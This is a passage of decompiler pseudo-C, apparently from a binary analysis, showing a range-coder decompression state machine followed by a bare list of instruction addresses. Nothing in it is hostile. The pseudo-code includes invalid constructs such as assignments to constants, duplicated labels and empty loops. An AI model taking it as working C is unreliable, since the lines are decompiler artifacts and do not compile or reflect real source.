													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                    0x00000000
                    0x00406ffe
                    0x00406ffe
                    0x00407002
                    0x00407023
                    0x0040702a
                    0x00407030
                    0x00407036
                    0x00407048
                    0x0040704e
                    0x00407053
                    0x00000000
                    0x00407004
                    0x0040700a
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x004073ce
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x0040741a
                    0x00000000
                    0x00000000
                    0x0040741c
                    0x00407420
                    0x004075cf
                    0x004075e5
                    0x004075ed
                    0x004075f4
                    0x004075f6
                    0x004075fd
                    0x00407601
                    0x00407601
                    0x0040742c
                    0x00407433
                    0x0040743b
                    0x0040743e
                    0x00407441
                    0x00407441
                    0x00407447
                    0x00407447
                    0x00406be3
                    0x00406be3
                    0x00406be3
                    0x00406bec
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x00000000
                    0x00406bfd
                    0x00000000
                    0x00000000
                    0x00406c06
                    0x00406c09
                    0x00406c0c
                    0x00406c10
                    0x00000000
                    0x00000000
                    0x00406c16
                    0x00406c19
                    0x00406c1b
                    0x00406c1c
                    0x00406c1f
                    0x00406c21
                    0x00406c22
                    0x00406c24
                    0x00406c27
                    0x00406c2c
                    0x00406c31
                    0x00406c3a
                    0x00406c4d
                    0x00406c50
                    0x00406c5c
                    0x00406c84
                    0x00406c86
                    0x00406c94
                    0x00406c94
                    0x00406c98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406c88
                    0x00406c88
                    0x00406c8b
                    0x00406c8c
                    0x00406c8c
                    0x00000000
                    0x00406c88
                    0x00406c62
                    0x00406c67
                    0x00406c67
                    0x00406c70
                    0x00406c78
                    0x00406c7b
                    0x00000000
                    0x00406c81
                    0x00406c81
                    0x00000000
                    0x00406c81
                    0x00000000
                    0x00406c9e
                    0x00406c9e
                    0x00406ca2
                    0x0040754e
                    0x00000000
                    0x0040754e
                    0x00406cab
                    0x00406cbb
                    0x00406cbe
                    0x00406cc1
                    0x00406cc1
                    0x00406cc1
                    0x00406cc4
                    0x00406cc8
                    0x00000000
                    0x00000000
                    0x00406cca
                    0x00406cd0
                    0x00406cfa
                    0x00406d00
                    0x00406d07
                    0x00000000
                    0x00406d07
                    0x00406cd6
                    0x00406cd9
                    0x00406cde
                    0x00406cde
                    0x00406ce9
                    0x00406cf1
                    0x00406cf4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d39
                    0x00406d3f
                    0x00406d42
                    0x00406d4f
                    0x00406d57
                    0x00000000
                    0x00000000
                    0x00406d0e
                    0x00406d0e
                    0x00406d12
                    0x0040755d
                    0x00000000
                    0x0040755d
                    0x00406d1e
                    0x00406d29
                    0x00406d29
                    0x00406d29
                    0x00406d2c
                    0x00406d2f
                    0x00406d32
                    0x00406d37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x0040741a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d5f
                    0x00406d61
                    0x00406d64
                    0x00406dd5
                    0x00406dd8
                    0x00406ddb
                    0x00406de2
                    0x00406dec
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x00406d66
                    0x00406d6a
                    0x00406d6d
                    0x00406d6f
                    0x00406d72
                    0x00406d75
                    0x00406d77
                    0x00406d7a
                    0x00406d7c
                    0x00406d81
                    0x00406d84
                    0x00406d87
                    0x00406d8b
                    0x00406d92
                    0x00406d95
                    0x00406d9c
                    0x00406da0
                    0x00406da8
                    0x00406da8
                    0x00406da8
                    0x00406da2
                    0x00406da2
                    0x00406da2
                    0x00406d97
                    0x00406d97
                    0x00406d97
                    0x00406dac
                    0x00406daf
                    0x00406dcd
                    0x00406dcf
                    0x00000000
                    0x00406db1
                    0x00406db1
                    0x00406db4
                    0x00406db7
                    0x00406dba
                    0x00406dbc
                    0x00406dbc
                    0x00406dbc
